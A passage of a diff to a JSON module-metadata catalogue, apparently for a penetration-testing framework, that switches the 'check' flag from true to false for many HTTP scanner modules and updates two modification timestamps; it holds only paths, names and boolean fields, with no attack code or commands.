    "path": "/modules/auxiliary/scanner/http/gitlab_user_enum.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/gitlab_user_enum",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -24775,7 +24873,7 @@
    "path": "/modules/auxiliary/scanner/http/glassfish_login.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/glassfish_login",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": true,
    "notes": {
@@ -24824,7 +24922,7 @@
    "path": "/modules/auxiliary/scanner/http/glassfish_traversal.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/glassfish_traversal",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -24872,7 +24970,7 @@
    "path": "/modules/auxiliary/scanner/http/goahead_traversal.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/goahead_traversal",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -24922,7 +25020,7 @@
    "path": "/modules/auxiliary/scanner/http/groupwise_agents_http_traversal.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/groupwise_agents_http_traversal",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -24966,11 +25064,11 @@
      "https"
    ],
    "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2019-11-22 15:09:08 +0000",
    "path": "/modules/auxiliary/scanner/http/host_header_injection.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/host_header_injection",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -25020,7 +25118,7 @@
    "path": "/modules/auxiliary/scanner/http/hp_imc_bims_downloadservlet_traversal.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/hp_imc_bims_downloadservlet_traversal",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -25070,7 +25168,7 @@
    "path": "/modules/auxiliary/scanner/http/hp_imc_faultdownloadservlet_traversal.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/hp_imc_faultdownloadservlet_traversal",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -25120,7 +25218,7 @@
    "path": "/modules/auxiliary/scanner/http/hp_imc_ictdownloadservlet_traversal.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/hp_imc_ictdownloadservlet_traversal",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -25170,7 +25268,7 @@
    "path": "/modules/auxiliary/scanner/http/hp_imc_reportimgservlt_traversal.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/hp_imc_reportimgservlt_traversal",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -25220,7 +25318,7 @@
    "path": "/modules/auxiliary/scanner/http/hp_imc_som_file_download.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/hp_imc_som_file_download",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -25269,7 +25367,7 @@
    "path": "/modules/auxiliary/scanner/http/hp_sitescope_getfileinternal_fileaccess.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/hp_sitescope_getfileinternal_fileaccess",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -25318,7 +25416,7 @@
    "path": "/modules/auxiliary/scanner/http/hp_sitescope_getsitescopeconfiguration.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/hp_sitescope_getsitescopeconfiguration",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -25367,7 +25465,7 @@
    "path": "/modules/auxiliary/scanner/http/hp_sitescope_loadfilecontent_fileaccess.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/hp_sitescope_loadfilecontent_fileaccess",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -25413,7 +25511,7 @@
    "path": "/modules/auxiliary/scanner/http/hp_sys_mgmt_login.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/hp_sys_mgmt_login",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": false,
    "notes": {
@@ -25461,7 +25559,7 @@
    "path": "/modules/auxiliary/scanner/http/http_header.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/http_header",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -25507,7 +25605,7 @@
    "path": "/modules/auxiliary/scanner/http/http_hsts.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/http_hsts",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -25555,7 +25653,7 @@
    "path": "/modules/auxiliary/scanner/http/http_login.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/http_login",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": false,
    "notes": {
@@ -25603,7 +25701,7 @@
    "path": "/modules/auxiliary/scanner/http/http_put.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/http_put",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -25700,7 +25798,7 @@
    "path": "/modules/auxiliary/scanner/http/http_traversal.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/http_traversal",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -25746,7 +25844,7 @@
    "path": "/modules/auxiliary/scanner/http/http_version.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/http_version",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -25783,7 +25881,7 @@
    "path": "/modules/auxiliary/scanner/http/httpbl_lookup.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/httpbl_lookup",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -25878,7 +25976,7 @@
    "path": "/modules/auxiliary/scanner/http/iis_internal_ip.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/iis_internal_ip",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -26022,7 +26120,7 @@
    "path": "/modules/auxiliary/scanner/http/infovista_enum.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/infovista_enum",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": false,
    "notes": {
@@ -26070,7 +26168,7 @@
    "path": "/modules/auxiliary/scanner/http/intel_amt_digest_bypass.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/intel_amt_digest_bypass",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -26116,7 +26214,7 @@
    "path": "/modules/auxiliary/scanner/http/ipboard_login.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/ipboard_login",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": false,
    "notes": {
@@ -26166,7 +26264,7 @@
    "path": "/modules/auxiliary/scanner/http/jboss_status.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/jboss_status",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -26217,7 +26315,7 @@
    "path": "/modules/auxiliary/scanner/http/jboss_vulnscan.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/jboss_vulnscan",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -26267,7 +26365,7 @@
    "path": "/modules/auxiliary/scanner/http/jenkins_command.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/jenkins_command",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -26313,7 +26411,7 @@
    "path": "/modules/auxiliary/scanner/http/jenkins_enum.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/jenkins_enum",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -26360,7 +26458,7 @@
    "path": "/modules/auxiliary/scanner/http/jenkins_login.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/jenkins_login",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": false,
    "notes": {
@@ -26406,7 +26504,7 @@
    "path": "/modules/auxiliary/scanner/http/joomla_bruteforce_login.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/joomla_bruteforce_login",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": false,
    "notes": {
@@ -26452,7 +26550,7 @@
    "path": "/modules/auxiliary/scanner/http/joomla_ecommercewd_sqli_scanner.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/joomla_ecommercewd_sqli_scanner",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -26499,7 +26597,7 @@
    "path": "/modules/auxiliary/scanner/http/joomla_gallerywd_sqli_scanner.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/joomla_gallerywd_sqli_scanner",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -26545,7 +26643,7 @@
    "path": "/modules/auxiliary/scanner/http/joomla_pages.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/joomla_pages",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -26591,7 +26689,7 @@
    "path": "/modules/auxiliary/scanner/http/joomla_plugins.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/joomla_plugins",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -26637,7 +26735,7 @@
    "path": "/modules/auxiliary/scanner/http/joomla_version.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/joomla_version",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -26684,7 +26782,7 @@
    "path": "/modules/auxiliary/scanner/http/kodi_traversal.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/kodi_traversal",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -26731,7 +26829,7 @@
    "path": "/modules/auxiliary/scanner/http/linknat_vos_traversal.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/linknat_vos_traversal",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -26781,7 +26879,7 @@
    "path": "/modules/auxiliary/scanner/http/linksys_e1500_traversal.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/linksys_e1500_traversal",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": true,
    "notes": {
@@ -26831,7 +26929,7 @@
    "path": "/modules/auxiliary/scanner/http/litespeed_source_disclosure.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/litespeed_source_disclosure",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -26877,7 +26975,7 @@
    "path": "/modules/auxiliary/scanner/http/lucky_punch.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/lucky_punch",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -26927,7 +27025,7 @@
    "path": "/modules/auxiliary/scanner/http/majordomo2_directory_traversal.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/majordomo2_directory_traversal",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -26973,7 +27071,7 @@
    "path": "/modules/auxiliary/scanner/http/manageengine_desktop_central_login.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/manageengine_desktop_central_login",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": false,
    "notes": {
@@ -27020,7 +27118,7 @@
    "path": "/modules/auxiliary/scanner/http/manageengine_deviceexpert_traversal.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/manageengine_deviceexpert_traversal",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -27069,7 +27167,7 @@
    "path": "/modules/auxiliary/scanner/http/manageengine_deviceexpert_user_creds.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/manageengine_deviceexpert_user_creds",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -27117,7 +27215,7 @@
    "path": "/modules/auxiliary/scanner/http/manageengine_securitymanager_traversal.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/manageengine_securitymanager_traversal",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -27167,7 +27265,7 @@
    "path": "/modules/auxiliary/scanner/http/mediawiki_svg_fileaccess.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/mediawiki_svg_fileaccess",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -27215,7 +27313,7 @@
    "path": "/modules/auxiliary/scanner/http/meteocontrol_weblog_extractadmin.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/meteocontrol_weblog_extractadmin",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -27261,7 +27359,7 @@
    "path": "/modules/auxiliary/scanner/http/mod_negotiation_brute.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/mod_negotiation_brute",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -27307,7 +27405,7 @@
    "path": "/modules/auxiliary/scanner/http/mod_negotiation_scanner.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/mod_negotiation_scanner",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -27358,7 +27456,7 @@
    "path": "/modules/auxiliary/scanner/http/ms09_020_webdav_unicode_bypass.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/ms09_020_webdav_unicode_bypass",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -27458,7 +27556,7 @@
    "path": "/modules/auxiliary/scanner/http/mybook_live_login.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/mybook_live_login",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": false,
    "notes": {
@@ -27507,7 +27605,7 @@
    "path": "/modules/auxiliary/scanner/http/netdecision_traversal.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/netdecision_traversal",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -27556,7 +27654,7 @@
    "path": "/modules/auxiliary/scanner/http/netgear_sph200d_traversal.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/netgear_sph200d_traversal",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": true,
    "notes": {
@@ -27606,7 +27704,7 @@
    "path": "/modules/auxiliary/scanner/http/nginx_source_disclosure.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/nginx_source_disclosure",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -27653,7 +27751,7 @@
    "path": "/modules/auxiliary/scanner/http/novell_file_reporter_fsfui_fileaccess.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/novell_file_reporter_fsfui_fileaccess",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -27701,7 +27799,7 @@
    "path": "/modules/auxiliary/scanner/http/novell_file_reporter_srs_fileaccess.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/novell_file_reporter_srs_fileaccess",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -27750,7 +27848,7 @@
    "path": "/modules/auxiliary/scanner/http/novell_mdm_creds.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/novell_mdm_creds",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -27796,7 +27894,7 @@
    "path": "/modules/auxiliary/scanner/http/ntlm_info_enumeration.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/ntlm_info_enumeration",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -27842,7 +27940,7 @@
    "path": "/modules/auxiliary/scanner/http/octopusdeploy_login.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/octopusdeploy_login",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": false,
    "notes": {
@@ -27875,11 +27973,11 @@

    ],
    "targets": null,
-    "mod_time": "2019-04-25 20:43:55 +0000",
+    "mod_time": "2019-11-01 19:20:22 +0000",
    "path": "/modules/auxiliary/scanner/http/onion_omega2_login.py",
    "is_install_path": true,
    "ref_name": "scanner/http/onion_omega2_login",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": false,
    "notes": {
@@ -27926,7 +28024,7 @@
    "path": "/modules/auxiliary/scanner/http/open_proxy.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/open_proxy",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -27972,7 +28070,7 @@
    "path": "/modules/auxiliary/scanner/http/openmind_messageos_login.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/openmind_messageos_login",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": true,
    "notes": {
@@ -28023,7 +28121,7 @@
    "path": "/modules/auxiliary/scanner/http/options.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/options",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -28072,7 +28170,7 @@
    "path": "/modules/auxiliary/scanner/http/oracle_demantra_database_credentials_leak.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/oracle_demantra_database_credentials_leak",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -28121,7 +28219,7 @@
    "path": "/modules/auxiliary/scanner/http/oracle_demantra_file_retrieval.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/oracle_demantra_file_retrieval",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -28167,7 +28265,7 @@
    "path": "/modules/auxiliary/scanner/http/oracle_ilom_login.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/oracle_ilom_login",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": false,
    "notes": {
@@ -28204,7 +28302,7 @@
    "path": "/modules/auxiliary/scanner/http/owa_ews_login.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/owa_ews_login",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": false,
    "notes": {
@@ -28250,7 +28348,7 @@
    "path": "/modules/auxiliary/scanner/http/owa_iis_internal_ip.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/owa_iis_internal_ip",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -28304,7 +28402,7 @@
    "path": "/modules/auxiliary/scanner/http/owa_login.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/owa_login",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": false,
    "notes": {
@@ -28350,7 +28448,7 @@
    "path": "/modules/auxiliary/scanner/http/phpmyadmin_login.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/phpmyadmin_login",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": true,
    "notes": {
@@ -28396,7 +28494,7 @@
    "path": "/modules/auxiliary/scanner/http/pocketpad_login.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/pocketpad_login",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": false,
    "notes": {
@@ -28442,7 +28540,7 @@
    "path": "/modules/auxiliary/scanner/http/prev_dir_same_name_file.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/prev_dir_same_name_file",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -28488,7 +28586,7 @@
    "path": "/modules/auxiliary/scanner/http/radware_appdirector_enum.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/radware_appdirector_enum",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": true,
    "notes": {
@@ -28535,7 +28633,7 @@
    "path": "/modules/auxiliary/scanner/http/rails_json_yaml_scanner.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/rails_json_yaml_scanner",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -28581,7 +28679,7 @@
    "path": "/modules/auxiliary/scanner/http/rails_mass_assignment.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/rails_mass_assignment",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -28629,7 +28727,7 @@
    "path": "/modules/auxiliary/scanner/http/rails_xml_yaml_scanner.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/rails_xml_yaml_scanner",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -28675,7 +28773,7 @@
    "path": "/modules/auxiliary/scanner/http/replace_ext.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/replace_ext",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -28722,7 +28820,7 @@
    "path": "/modules/auxiliary/scanner/http/rewrite_proxy_bypass.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/rewrite_proxy_bypass",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -28768,7 +28866,7 @@
    "path": "/modules/auxiliary/scanner/http/rfcode_reader_enum.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/rfcode_reader_enum",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": false,
    "notes": {
@@ -28816,7 +28914,7 @@
    "path": "/modules/auxiliary/scanner/http/rips_traversal.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/rips_traversal",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -28863,7 +28961,7 @@
    "path": "/modules/auxiliary/scanner/http/riverbed_steelhead_vcx_file_read.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/riverbed_steelhead_vcx_file_read",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": true,
    "notes": {
@@ -28909,7 +29007,7 @@
    "path": "/modules/auxiliary/scanner/http/robots_txt.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/robots_txt",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -28957,7 +29055,7 @@
    "path": "/modules/auxiliary/scanner/http/s40_traversal.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/s40_traversal",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -29003,7 +29101,7 @@
    "path": "/modules/auxiliary/scanner/http/sap_businessobjects_user_brute.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/sap_businessobjects_user_brute",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": false,
    "notes": {
@@ -29050,7 +29148,7 @@
    "path": "/modules/auxiliary/scanner/http/sap_businessobjects_user_brute_web.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/sap_businessobjects_user_brute_web",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": false,
    "notes": {
@@ -29096,7 +29194,7 @@
    "path": "/modules/auxiliary/scanner/http/sap_businessobjects_user_enum.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/sap_businessobjects_user_enum",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": false,
    "notes": {
@@ -29142,7 +29240,7 @@
    "path": "/modules/auxiliary/scanner/http/sap_businessobjects_version_enum.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/sap_businessobjects_version_enum",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -29188,7 +29286,7 @@
    "path": "/modules/auxiliary/scanner/http/scraper.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/scraper",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -29234,7 +29332,7 @@
    "path": "/modules/auxiliary/scanner/http/sentry_cdu_enum.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/sentry_cdu_enum",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": true,
    "notes": {
@@ -29280,7 +29378,7 @@
    "path": "/modules/auxiliary/scanner/http/servicedesk_plus_traversal.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/servicedesk_plus_traversal",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -29326,7 +29424,7 @@
    "path": "/modules/auxiliary/scanner/http/sevone_enum.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/sevone_enum",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": false,
    "notes": {
@@ -29376,7 +29474,7 @@
    "path": "/modules/auxiliary/scanner/http/simple_webserver_traversal.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/simple_webserver_traversal",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -29426,7 +29524,7 @@
    "path": "/modules/auxiliary/scanner/http/smt_ipmi_49152_exposure.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/smt_ipmi_49152_exposure",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -29475,7 +29573,7 @@
    "path": "/modules/auxiliary/scanner/http/smt_ipmi_cgi_scanner.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/smt_ipmi_cgi_scanner",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -29514,7 +29612,7 @@
    "path": "/modules/auxiliary/scanner/http/smt_ipmi_static_cert_scanner.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/smt_ipmi_static_cert_scanner",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -29562,7 +29660,7 @@
    "path": "/modules/auxiliary/scanner/http/smt_ipmi_url_redirect_traversal.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/smt_ipmi_url_redirect_traversal",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": true,
    "notes": {
@@ -29608,7 +29706,7 @@
    "path": "/modules/auxiliary/scanner/http/soap_xml.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/soap_xml",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -29655,7 +29753,7 @@
    "path": "/modules/auxiliary/scanner/http/sockso_traversal.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/sockso_traversal",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -29702,7 +29800,7 @@
    "path": "/modules/auxiliary/scanner/http/splunk_web_login.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/splunk_web_login",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": false,
    "notes": {
@@ -29750,7 +29848,7 @@
    "path": "/modules/auxiliary/scanner/http/springcloud_traversal.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/springcloud_traversal",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -29796,7 +29894,7 @@
    "path": "/modules/auxiliary/scanner/http/squid_pivot_scanning.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/squid_pivot_scanning",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -29843,7 +29941,7 @@
    "path": "/modules/auxiliary/scanner/http/squiz_matrix_user_enum.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/squiz_matrix_user_enum",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -29882,7 +29980,7 @@
    "path": "/modules/auxiliary/scanner/http/ssl.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/ssl",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -29930,7 +30028,7 @@
    "path": "/modules/auxiliary/scanner/http/ssl_version.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/ssl_version",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -29980,7 +30078,7 @@
    "path": "/modules/auxiliary/scanner/http/support_center_plus_directory_traversal.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/support_center_plus_directory_traversal",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": true,
    "notes": {
@@ -30072,7 +30170,7 @@
    "path": "/modules/auxiliary/scanner/http/svn_scanner.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/svn_scanner",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -30118,7 +30216,7 @@
    "path": "/modules/auxiliary/scanner/http/svn_wcdb_scanner.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/svn_wcdb_scanner",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -30168,7 +30266,7 @@
    "path": "/modules/auxiliary/scanner/http/sybase_easerver_traversal.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/sybase_easerver_traversal",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -30216,7 +30314,7 @@
    "path": "/modules/auxiliary/scanner/http/symantec_brightmail_ldapcreds.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/symantec_brightmail_ldapcreds",
